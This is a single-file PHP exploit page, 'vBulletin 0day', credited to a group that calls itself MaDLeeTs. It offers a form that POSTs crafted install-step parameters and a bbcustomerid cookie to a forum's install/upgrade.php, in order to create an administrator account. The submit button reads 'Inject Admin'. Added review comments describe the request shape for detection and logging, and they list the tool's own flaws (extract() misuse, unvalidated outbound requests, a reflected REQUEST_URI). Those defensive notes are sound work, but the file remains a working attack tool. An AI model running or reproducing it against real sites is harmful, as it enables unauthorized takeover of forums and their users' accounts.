- <!-- Single-file PHP page: static banner, a PHP request builder, then an input form. The title and heading carry the author's own claim about affected versions (4.x.x and 5.x.x) and a discovery date; nothing in this file verifies either. There is no doctype, so browsers render the page in quirks mode. -->
- <html xmlns="http://www.w3.org/1999/xhtml"><head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <title>vBulletin 0day</title>
- <style type="text/css">
- <!--
- body {
- background-color: #000;
- text-align: center;
- color: #063;
- font-size: large;
- }
- .a { font-size: 24px;
- }
- .f { color: #060;
- }
- .gbf { color: #F00;
- }
- .dd {
- color: #F00;
- }
- .w {
- font-size: large;
- }
- a:link {
- text-decoration: none;
- }
- a:visited {
- text-decoration: none;
- }
- a:hover {
- text-decoration: none;
- }
- a:active {
- text-decoration: none;
- }
- -->
- </style></head><body>
- <!-- NOTE(review): an h1 cannot be nested in a p; the parser closes the paragraph before the heading, so class "a" does not apply to it and the closing p tag below is left unmatched. -->
- <p class="a">
- <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1>
- <br>Created by: 1337
- <br>Found on: 08/22/2013
- <br>Website: http://www.madleets.com
- </p>
- <br>
- <?php
- // Request builder: on form submission this block sends one cURL POST to the
- // operator-supplied URL and exits. For defenders, the request shape is the useful
- // part: a POST to an install/upgrade.php path (see the form's example URL) carrying
- // version=install, step=7, htmlsubmit=1 and htmldata[username|password|confirmpassword|email],
- // plus a bbcustomerid cookie. Request bodies are often not in default access logs, so
- // matching on these fields needs body logging or a WAF rule. The install directory
- // should not be web-reachable on a production forum: remove or restrict it after
- // installing or upgrading, and review recently created privileged accounts.
- // Runs only when the POST contains the submit button's name.
- if(isset($_POST['submit'])){
- // NOTE(review): extract() copies every POST key into a local variable. Nothing below
- // needs it (values are read from $_POST directly), and it allows a request to pre-set
- // $fields_string, which is appended to further down without being initialised.
- extract($_POST);
- // Destination is taken from the form as-is: no scheme, host or path validation, so
- // wherever this page is hosted it will issue server-side requests to any URL given.
- $url = $_POST['url'];
- // Body of the outgoing request. The literals are fixed; customerid and the
- // htmldata[...] account fields come from the form. urlencode() leaves the literal
- // values unchanged.
- $fields = array(
- 'ajax' => urlencode('1'),
- 'version' => urlencode('install'),
- 'checktable' => urlencode('false'),
- 'firstrun' => urlencode('false'),
- 'step' => urlencode('7'),
- 'startat' => urlencode('0'),
- 'only' => urlencode('false'),
- 'customerid' => urlencode($_POST['customerid']),
- 'options[skiptemplatemerge]' => urlencode('0'),
- 'response' => urlencode('yes'),
- 'htmlsubmit' => urlencode('1'),
- 'htmldata[username]' => urlencode($_POST['username']),
- // The same submitted password is sent as both password and confirmpassword.
- 'htmldata[password]' => urlencode($_POST['password']),
- 'htmldata[confirmpassword]' => urlencode($_POST['password']),
- 'htmldata[email]' => urlencode($_POST['email'])
- );
- // Hand-built form body: keys are concatenated unencoded, so the square brackets in
- // 'options[...]' and 'htmldata[...]' go out literally.
- foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
- // Return value is discarded, so the trailing '&' stays on the body that is sent.
- rtrim($fields_string, '&');
- // New cURL handle; no timeout or error handling is configured anywhere below.
- $ch = curl_init();
- // Target URL, POST mode (count($fields) only serves as a truthy value) and body.
- curl_setopt($ch,CURLOPT_URL, $url);
- curl_setopt($ch,CURLOPT_POST, count($fields));
- curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
- // Start a fresh cookie session and repeat the customer ID as the bbcustomerid cookie.
- curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
- curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
- // CURLOPT_RETURNTRANSFER is not set, so cURL writes the remote response straight into
- // this page's output, unescaped, and $result only receives a boolean that is never checked.
- $result = curl_exec($ch);
- // Release the handle.
- curl_close($ch);
- // Stop here so the form below is not rendered after a submission.
- exit();
- }
- ?>
- <!-- Input form that feeds the PHP block above. NOTE(review): the action attribute echoes $_SERVER['REQUEST_URI'] without htmlspecialchars(), so markup placed in the request URI is reflected into this page. No CSRF token is present, and the password box is type="text", so the value is shown on screen. The example URL names the endpoint the request is meant for: the forum's install/upgrade.php. -->
- <center>
- <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
- <span>Example:http://test.com/forum/install/upgrade.php</span><br>
- <span>Website:</span>
- <input name="url" type="text" tabindex="1" size="60" />
- <br>
- <span>Customer ID:</span>
- <input name="customerid" type="text" tabindex="2" size="40" />
- <br>
- <span>Username:</span>
- <input name="username" type="text" tabindex="3" size="40" />
- <br>
- <span>Password:</span>
- <input name="password" type="text" tabindex="4" size="40" />
- <br>
- <span>Email:</span>
- <input name="email" type="text" tabindex="5" maxlength="40" />
- <!-- The button's name, "submit", is the key the PHP block tests with isset(). -->
- <input name="submit" type="submit" value="Inject Admin">
- </form>
- </center>
- <!-- Attribution banner (self-claimed by the author). NOTE(review): the closing div and pre tags below have no opening tags in this file, and the final p with align="center" is never closed; browsers recover from this, but the markup is not valid. -->
- <p class="a">------------------------------------------------------------------------------------------------------------------</p>
- <p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p>
- <p class="a">------------------------------------------------------------------------------------------------------------------</p>
- </div>
- </pre>
- <p class="a"> </p>
- <p align="center">
- </body></html>